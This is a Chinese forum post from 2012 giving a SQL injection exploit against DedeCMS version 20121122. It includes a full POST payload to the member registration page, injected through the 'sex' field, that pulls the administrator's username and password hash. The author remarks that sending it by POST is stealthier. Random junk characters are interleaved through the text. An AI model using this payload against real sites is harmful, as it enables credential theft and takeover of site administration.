dedecms版本 20121122
: m6 P. S+ C1 `. T( o0 [( I' A
7 _+ w1 H4 \: }& ], k需要magic_quotes_gpc=Off( C1 @7 j; k3 c- Q' i5 ?4 s5 p9 _
# g9 d6 H0 |/ P' z应该是没有什么大危害的漏洞.
, B$ m( r& u1 l* N8 X原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; W, e9 v) n3 K5 `8 i: f9 c0 Z
# D5 j; ]6 {$ }是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.# p% |$ `, i; f$ N
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
! T0 N+ F9 C0 w% N& `/ H. T5 o
% P' u& k( m6 e; J3 zhttp:///de/member/reg_new.php
( `, M5 q" i: c4 B. ?- p! x' n, ]; T
' b7 N6 D7 z3 D% R, tPOST9 {- R, l$ T, f# F0 ]
& X$ } Y7 ~( h* K* W; |
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=7 y( Q5 d7 R/ A+ U6 @* P
' }$ z5 M5 Z/ M S' x# J C( I成功注册后,头像处里面有好玩的信息.
% b5 ^7 d! V& j, M( y& e" M. A; B: i! I( g6 }1 B! B5 `; V& D
|
发表于 2012-12-5 10:03:32
收藏
支持
反对